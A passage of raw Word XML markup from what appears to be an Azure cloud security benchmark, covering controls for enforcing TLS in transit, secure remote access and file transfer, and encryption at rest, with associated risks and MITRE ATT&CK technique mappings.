        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Legacy fallback (SSL/TLS &lt; 1.2, plaintext HTTP/FTP) enables exploitation of deprecated cipher suites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE2FE2C" w14:textId="300657B4" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Session hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F06143E" w14:textId="75076204" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Lack of channel integrity allows token replay or cookie theft for lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A82029" w14:textId="69772DA3" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:lastRenderedPageBreak/>
        <w:t>Integrity manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A6AD0B" w14:textId="0441BAE1" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Tampering corrupts analytics or triggers fraudulent transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE119C2" w14:textId="4A9AEBA7" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Opaque lateral paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F8F0BB" w14:textId="14F387B7" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t xml:space="preserve">Internal </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005305F2">
        <w:t>plaintext</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005305F2">
        <w:t xml:space="preserve"> traffic becomes reconnaissance material post foothold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A7B318" w14:textId="6AF506AC" w:rsidR="005305F2" w:rsidRDefault="005305F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132ECFAA" w14:textId="2283E9B1" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE35232" w14:textId="3DE18530" w:rsidR="008C7D31" w:rsidRDefault="008C7D31" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="380"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7D31">
        <w:t>unprotected credentials (T1552) intercepted during plaintext or downgraded TLS sessions exposing tokens/session material.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226B1C72" w14:textId="0EC22DE6" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E670C5C" w14:textId="7C8B6EFC" w:rsidR="008C7D31" w:rsidRDefault="008C7D31" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="380"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7D31">
        <w:t>network sniffing (T1040) harvesting API payloads and secrets traversing weak cipher or cleartext paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0393D24D" w14:textId="20CF829F" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCDBA11" w14:textId="7BBDAEB1" w:rsidR="008C7D31" w:rsidRDefault="008C7D31" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="380"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7D31">
        <w:t>exfiltration over web services (T1567) streaming structured data through legitimate API endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6B2EE1" w14:textId="347C1B91" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CC794F" w14:textId="42F641F0" w:rsidR="008C7D31" w:rsidRDefault="008C7D31" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="380"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7D31">
        <w:t>adversary-in-the-middle (T1557) forcing TLS downgrade or inserting interception proxies to view/modify traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAD42CF" w14:textId="4EDE1047" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Command &amp; Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B7F7B9" w14:textId="4B477A57" w:rsidR="008C7D31" w:rsidRDefault="008C7D31" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="380"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7D31">
        <w:t>non-application layer protocol (T1095) reverting to legacy or less-inspected transports to bypass monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E09EA27" w14:textId="77777777" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="005305F2"/>
    <w:p w14:paraId="70EF6EE8" w14:textId="77777777" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="005305F2"/>
    <w:p w14:paraId="11721F14" w14:textId="77777777" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="005305F2"/>
    <w:p w14:paraId="58956DE5" w14:textId="425DCC6F" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="005305F2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>DP-3.1: Enforce TLS encryption for data services and applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623CE0E0" w14:textId="3E351AA7" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Establish modern transport layer security standards across all customer-facing services and data platforms to protect against interception, tampering, and man-in-the-middle attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58716E91" w14:textId="4CD42A87" w:rsidR="005305F2" w:rsidRDefault="005305F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Enforce TLS for data services and applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5C1047" w14:textId="043C87FA" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Enforce secure transfer (HTTPS only) for Azure Storage accounts to ensure all client connections use TLS 1.2 or later for blob, file, queue, and table operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2931C821" w14:textId="184CD079" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>For web applications hosted on Azure App Service, enable "HTTPS Only" setting and configure minimum TLS version to 1.2 or 1.3 to prevent downgrade attacks and ensure modern cryptographic standards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044C73CD" w14:textId="3B00802E" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Configure Azure Application Gateway to enforce TLS 1.2/1.3 minimum version for both frontend listeners and backend connection encryption (end-to-end TLS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E7A791" w14:textId="31C7607E" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:lastRenderedPageBreak/>
        <w:t>For Azure SQL Database and other PaaS data services, verify that "Require Secure Connections" or equivalent settings enforce encrypted connections; reject plaintext connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E352B4" w14:textId="6E200199" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>For API Management, Azure Front Door, and other gateway services, configure minimum TLS version policies to enforce TLS 1.2 or higher and disable weak cipher suites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E97F6" w14:textId="618E6D48" w:rsidR="006225D4" w:rsidRPr="006225D4" w:rsidRDefault="006225D4" w:rsidP="006225D4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>DP-3.2: Secure remote access and file transfer protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207DD2A3" w14:textId="77777777" w:rsidR="005305F2" w:rsidRPr="005305F2" w:rsidRDefault="005305F2" w:rsidP="005305F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22ABECA4" w14:textId="3730AA1D" w:rsidR="00105F1F" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Eliminate plaintext administrative access and legacy file transfer protocols that expose credentials and sensitive data during operational activities. Replace insecure protocols (FTP, unencrypted RDP/SSH) with modern, encrypted alternatives and route privileged access through centralized bastions to eliminate direct internet exposure of management interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C81CCD" w14:textId="500A3E3F" w:rsidR="005305F2" w:rsidRDefault="005305F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Secure remote management protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F3B46B" w14:textId="4C4CA6C7" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Linux VMs: Use SSH (port 22) with key-based authentication; disable password authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA92085" w14:textId="038C8368" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Windows VMs: Use RDP over TLS (port 3389) with Network Level Authentication (NLA) enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A878917" w14:textId="40E4CCC8" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Privileged access: Route administrative connections through Azure Bastion to eliminate public IP exposure and provide browser-based or native client access over TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199C3646" w14:textId="7B3FA315" w:rsidR="005305F2" w:rsidRDefault="005305F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Secure file transfer protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7839C214" w14:textId="1D35F6B4" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>For file transfer operations, use secure protocols and disable legacy alternatives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD77831" w14:textId="77777777" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r>
        <w:t>Use SFTP support in Azure Blob Storage (requires hierarchical namespace).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172AE49E" w14:textId="77777777" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r>
        <w:t>Use FTPS in Azure App Service and Azure Functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CF1AA9" w14:textId="63913BB1" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r>
        <w:t>Disable legacy FTP protocol (plaintext).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EBC424" w14:textId="2E4AF1D0" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Use Azure Policy to enforce secure transfer policies across your environment and monitor compliance for TLS version requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185B2DEA" w14:textId="77777777" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="005305F2"/>
    <w:p w14:paraId="3EE36558" w14:textId="38E3FFD3" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="005305F2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc242449506"/>
      <w:r w:rsidRPr="005305F2">
        <w:t>DP-4: Enable data at rest encryption by default</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="50E7FEC4" w14:textId="62EC415D" w:rsidR="005305F2" w:rsidRDefault="005305F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DF06CA" w14:textId="4F0A6523" w:rsidR="006225D4" w:rsidRDefault="006225D4" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t xml:space="preserve">Enable encryption at rest by default to protect data against unauthorized access through underlying storage, physical media theft, snapshot exposure, or compromised infrastructure access. Encryption complements access controls </w:t>
      </w:r>
      <w:r w:rsidRPr="006225D4">
        <w:lastRenderedPageBreak/>
        <w:t>by ensuring data remains protected even when storage-level security is bypassed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3912E655" w14:textId="51068BBB" w:rsidR="006225D4" w:rsidRDefault="006225D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006225D4">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="34C8221B" w14:textId="7A910C99" w:rsidR="006225D4" w:rsidRDefault="006225D4" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t>Data harvesting from raw media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6FE072" w14:textId="18AE6CCA" w:rsidR="006225D4" w:rsidRDefault="006225D4" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t>Stolen disks, backups, or unmanaged snapshots expose full plaintext datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CFCDBF" w14:textId="18E6A2AD" w:rsidR="006225D4" w:rsidRDefault="006225D4" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t>Privilege boundary erosion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6822AAB2" w14:textId="52F5CFD5" w:rsidR="006225D4" w:rsidRDefault="006225D4" w:rsidP="00CA7928">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t>Platform administrators or compromised host agents can read tenant data absent cryptographic segregation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E29E55A" w14:textId="55BCC921" w:rsidR="006225D4" w:rsidRDefault="006225D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t>Silent copy &amp; exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0AB3AD" w14:textId="4C6A49B1" w:rsidR="006225D4" w:rsidRDefault="006225D4" w:rsidP="00CA7928">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t>Unencrypted replicas (test, analytics, export) become low-friction exfiltration channels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408AD5A5" w14:textId="0145CA03" w:rsidR="006225D4" w:rsidRDefault="006225D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t>Integrity tampering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB471C4" w14:textId="68861EBB" w:rsidR="006225D4" w:rsidRDefault="006225D4" w:rsidP="00CA7928">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t>Attackers modify dormant data (malicious DLLs, configuration, or reference data) to trigger later-stage compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AAC1EF" w14:textId="0DA76158" w:rsidR="006225D4" w:rsidRDefault="006225D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t>Regulatory non-compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75620588" w14:textId="19A2A898" w:rsidR="006225D4" w:rsidRDefault="006225D4" w:rsidP="00CA7928">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t>Lack of systemic encryption undermines assurances required for many industry certifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCD625A" w14:textId="29B0911B" w:rsidR="006225D4" w:rsidRDefault="006225D4" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t>Keyless recovery exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342747D2" w14:textId="671A4E8B" w:rsidR="006225D4" w:rsidRDefault="006225D4" w:rsidP="00CA7928">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t>Disaster recovery images and cold archives retain sensitive content indefinitely in recoverable plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9E948C" w14:textId="62A52D15" w:rsidR="006225D4" w:rsidRDefault="006225D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E26CD" w14:textId="3D35561F" w:rsidR="006225D4" w:rsidRDefault="006225D4" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2435238A" w14:textId="1A779451" w:rsidR="00E02617" w:rsidRDefault="00E02617" w:rsidP="00CA7928">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E02617">
        <w:t>data from cloud storage (T1530) by extracting unencrypted snapshots, replicas, or detached disks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E98887" w14:textId="74060B6C" w:rsidR="006225D4" w:rsidRDefault="006225D4" w:rsidP="00261B5A">
      <w:pPr>
